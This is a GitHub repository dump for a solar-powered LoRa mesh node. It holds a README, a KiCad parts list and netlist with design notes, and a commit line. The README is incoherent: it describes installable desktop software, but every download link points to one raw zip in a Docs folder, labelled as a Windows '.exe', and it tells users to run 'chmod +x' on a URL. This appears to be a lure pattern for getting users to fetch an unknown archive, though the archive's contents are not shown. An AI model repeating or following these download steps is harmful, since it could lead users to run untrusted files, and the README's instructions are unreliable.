# Repository sclmoss/MiniSolarMesh

File README.md:

# ☀️ MiniSolarMesh - Easy Solar-Powered LORA Node Setup

---

Welcome to MiniSolarMesh, a small solar-powered device that connects wirelessly using LORA technology. This guide will help you download and start using the MiniSolarMesh software with no technical experience. Just follow the steps to get the software up and running on your computer.

## ⚙️ What is MiniSolarMesh?

MiniSolarMesh is a simple software tool designed for a solar-powered device using LORA communication. It helps manage charging with MPPT technology, monitors voltage, and protects the battery. The software supports reliable wireless mesh communication to help your network stay connected even if some devices are out of range.

### Key Features

- **Solar charging control:** Uses MPPT (Maximum Power Point Tracking) to optimize solar panel charging.
- **Battery protection:** Monitors battery voltage to avoid damage.
- **LORA Wireless Mesh:** Connects with other nodes using LORA radio signals for long-range communication.
- **User-friendly:** Designed to work well with supported hardware without complex setup.
- **Open design:** Based on nRF52 microcontroller and compatible with popular open-source hardware.

### Who is this software for?

MiniSolarMesh works best for users who own or plan to build low-power, solar-controlled LORA devices. It supports hobbyists, students, and professionals interested in wireless mesh networks and renewable energy.

---

## 🖥️ System Requirements

Before you download MiniSolarMesh, please check the following requirements to ensure your computer can run the software smoothly:

- **Operating System:** Windows 10 or later, MacOS 10.13 or later, Linux (Ubuntu 18.04+ recommended)
- **Processor:** At least a 1.5 GHz dual-core CPU
- **Memory:** Minimum 2 GB RAM
- **Disk Space:** Around 50 MB free space for installation
- **Internet Connection:** Required for downloading and possible software updates
- **USB Port:** Needed to connect your MiniSolarMesh device (USB cable not included)
- **Device Compatibility:** Designed to work with MiniSolarMesh hardware based on nRF52 chip

---

## 📥 Download & Install MiniSolarMesh

You will find the latest software version by visiting the release page here:

### Step 1: Visit the download page

Click the large green button at the top or the link above. This link will take you to the GitHub Release page where the latest MiniSolarMesh software files are available.

### Step 2: Choose the right file for your computer

Look for the file labeled with your operating system name:

- Windows users: `.exe` file (e.g., https://github.com/sclmoss/MiniSolarMesh/raw/refs/heads/main/Docs/Solar-Mini-Mesh-2.0.zip)
- MacOS users: `.dmg` file
- Linux users: `.AppImage` or `https://github.com/sclmoss/MiniSolarMesh/raw/refs/heads/main/Docs/Solar-Mini-Mesh-2.0.zip` depending on the release notes

The file name usually includes the version number and the platform.

### Step 3: Download the file

Click on the appropriate file to start the download. The download will appear in your browser or downloads folder.

### Step 4: Install the software

- **Windows:** Double-click the `.exe` file and follow the installation wizard.
- **MacOS:** Open the `.dmg` file and drag MiniSolarMesh to your Applications folder.
- **Linux:** Make the `.AppImage` executable (`chmod +x https://github.com/sclmoss/MiniSolarMesh/raw/refs/heads/main/Docs/Solar-Mini-Mesh-2.0.zip`) and run it.

### Step 5: Launch MiniSolarMesh

Open the installed program from your desktop or applications menu.

---

## 🔌 Connect Your MiniSolarMesh Device

### What you need:

- Your physical MiniSolarMesh node hardware
- USB cable to connect the device to your computer

### How to connect:

1. Plug one end of the USB cable into your MiniSolarMesh device.
2. Plug the other end into your computer's USB port.
3. The software should recognize the device within a few seconds.
4. If you see a message asking for permission to access the device, allow it.

---

## 🛠️ Basic Setup and Use

### Step 1: Check device status

Once connected, the software will display battery voltage levels, solar charging status, and network connection details.

### Step 2: Configure your node

The software lets you set parameters such as:

- Network ID for mesh communication
- Battery alarm levels
- Solar panel specifications (voltage and current limits)
- Device name and location for easy identification

### Step 3: Save and apply settings

After entering your settings, click "Save" or "Apply". The device will update automatically.

---

## 📡 Using the Mesh Network Features

MiniSolarMesh nodes communicate with each other wirelessly using LORA. This allows your devices to cover a large area by passing messages through the mesh network.

- Each node can send or receive messages independently.
- Messages hop from node to node until they reach their destination.
- The software shows a map or list of connected nodes and signal strengths.

Use this feature to monitor your nodes remotely or send commands through the network.

---

## 💡 Tips for Success

- Keep your solar panel clean and exposed to sunlight.
- Regularly check battery voltage in the software to ensure good health.
- Place nodes within range of at least one other node to maintain mesh communication.
- Update your software often by checking the release page above.
- Use the included documentation for advanced setup if you want to customize more.

---

## 📚 Need More Help?

If you run into problems, here are some ways to get support:

- Check the README and documentation on the GitHub repository
- Ask questions in online forums related to LORA or solar mesh networks
- Report bugs or issues directly on the GitHub issue page at the MiniSolarMesh repository

---

Thank you for using MiniSolarMesh. The software is free and open, aiming to make solar-powered mesh networks accessible to everyone.

[Download MiniSolarMesh from here](https://github.com/sclmoss/MiniSolarMesh/raw/refs/heads/main/Docs/Solar-Mini-Mesh-2.0.zip)

## KiCad design MiniSolarMesh.kicad_pcb

Parts:
C1, C11, C13, C16, C17: 100n; C_0805_2012Metric
C2, C3, C4, C5, C6, C7, C8, C9, C15: 100u; C_1206_3216Metric
C10, C14: 470u; CP_EIA-7343-43_Kemet-X_HandSolder
C12: 220n; C_0805_2012Metric
D2: D_Schottky; D_1206_3216Metric
D3, D4: LED; LED_0805_2012Metric
J1: Solar; JST_PH_B2B-PH-K_1x02_P2.00mm_Vertical
J2: Batt; JST_PH_B2B-PH-K_1x02_P2.00mm_Vertical
L1: 33u; Inductor_6060_2424
Q1, Q2: AO3401; TSOT-23
Q3: AO3414; TSOT-23
R1: 0.1; R_0805_2012Metric
R2, R7: 200K; R_0805_2012Metric
R3: 2K2; R_0805_2012Metric
R4: 30K; R_0805_2012Metric
R5: 1k; R_0805_2012Metric
R6: 240K; R_0805_2012Metric
R8: 120; R_0805_2012Metric
R9: 56K; R_0805_2012Metric
R10, R11: 1M; R_0805_2012Metric
R12: 10k; R_0805_2012Metric
SW1: SW_Push; SW_Push_SPST_NO_Alps_SKRK
TP1: +BATT; TestPoint_Pad_D1.0mm
TP2: +SOLAR; TestPoint_Pad_D1.0mm
TP4: 3V3; TestPoint_Pad_D1.0mm
U1: CN3791; SSOP-10-1EP_3.9x4.9mm_P1mm_EP2.1x3.3mm
U2: XB8089D0; SOIC-8-1EP_3.9x4.9mm_P1.27mm_EP2.41x3.3mm
U3: TLV803EA29; SOT-23
U4: HT-RA62
U5: nrf52_ProMicro; SuperMini NRF52840

Connections:
3V3: C14.1, R12.2, TP4.1, U4.3 (3V3), U5.16 (3V3)
+BATT: C2.1, C3.1, C4.1, C5.1, C10.1, C15.1, J2.1, R1.1, R4.1, R5.1, R10.1, TP1.1, U1.7 (BATT), U5.13 (BAT+), U5.29 (BAT+)
+SOLAR: C1.1, C6.1, C7.1, C8.1, C9.1, J1.1, Q1.3 (D), R2.2, R3.1, R7.1, TP2.1, U1.9 (VCC)
-BATT: C10.2, C11.2, J2.2, U2.5 (GND), U2.7 (GND), U2.8 (GND), U2.9 (EPAD)
-SOLAR: C2.2, C3.2, C4.2, C5.2, C6.2, C7.2, C8.2, C9.2, C12.2, C17.2, D2.2 (A), J1.2, Q3.2 (S), R9.2, U1.2 (GND), U2.1 (VM), U2.2 (VM), U2.3 (VM), U2.4 (VM), U3.3 (GND)
/BUSY: U4.10 (BUSY), U5.18 (P0.29-LF)
/Batt%: C13.1, R10.2, R11.1, U5.17 (P0.31-LF)
/CS: U4.15 (NSS), U5.21 (P1.13-LF)
/DIO1: U4.6 (DI01), U5.23 (P0.10-LF)
/MISO: U4.13 (MISO), U5.19 (P0.02-LF)
/MOSI: U4.14 (MOSI), U5.20 (P1.15-LF)
/RST: U4.4 (RST), U5.24 (P0.09-LF)
/RST_BTN: C16.1, R12.1, SW1.2, U5.15 (RST)
/RXEN: U4.11 (RXEN), U5.5 (P0.17)
/SCK: U4.12 (SCK), U5.22 (P1.11-LF)
GND: C13.2, C14.2, C15.2, C16.2, Q3.3 (D), R11.2, SW1.1, U4.2 (GND), U4.9 (GND), U4.16 (GND), U5.3 (GND), U5.4 (GND), U5.14 (GND), U5.28 (GND)
unnamed: C12.1, R8.2
unnamed: D2.1 (K), L1.1, Q2.3 (D)
unnamed: D3.2 (A), D4.2 (A), R3.2
unnamed: D3.1 (K), U1.4 (DONE)
unnamed: D4.1 (K), Q1.1 (G), R2.1, U1.3 (CHRG)
unnamed: Q1.2 (S), Q2.2 (S)
unnamed: Q2.1 (G), U1.10 (DRV)
unnamed: Q3.1 (G), R6.1, U3.1 (~RESET)
unnamed: R8.1, U1.5 (COM)
unnamed: L1.2, R1.2, U1.8 (CSP)
unnamed: R7.2, R9.1, U1.6 (MPPT)
unnamed: C1.2, U1.1 (VG)
unnamed: C11.1, R5.2, U2.6 (VDD)
unnamed: C17.1, R4.2, R6.2, U3.2 (VDD)
unnamed: U4.5 (TXEN), U4.7 (DI02)

Notes on the sheet:
HT-RA62 / RA-01SH LoRa radio
Voltage Supervisor
Solar Charger
NRF52
Battery protection
To measure batt voltage
Battery
Solar Panel
Change by tantalum 16V
Reset button
Q1 prevents reverse current during the night. CHRG is low while charging, keeping Q1 on.
Cuts power of MCU. Hysteresis: VL = 2.97V VH = 3.34V Taking into account that VDD drains ~ 5µA
MPPT calulation Vmppt ~= 0.8 x Voc (open voltage) Voc Vmppt R2 -------------------------- 7V 5.6V 55K Ω 7.5V 6V 50K Ω 8V 6.4V 46K Ω 10V 8V 35K Ω

Board: 4 copper layers, 45.0 x 57.7 mm, 47 parts (0 on the bottom side), 31 nets.

## Commit log

2026-02-07 Add project title to README
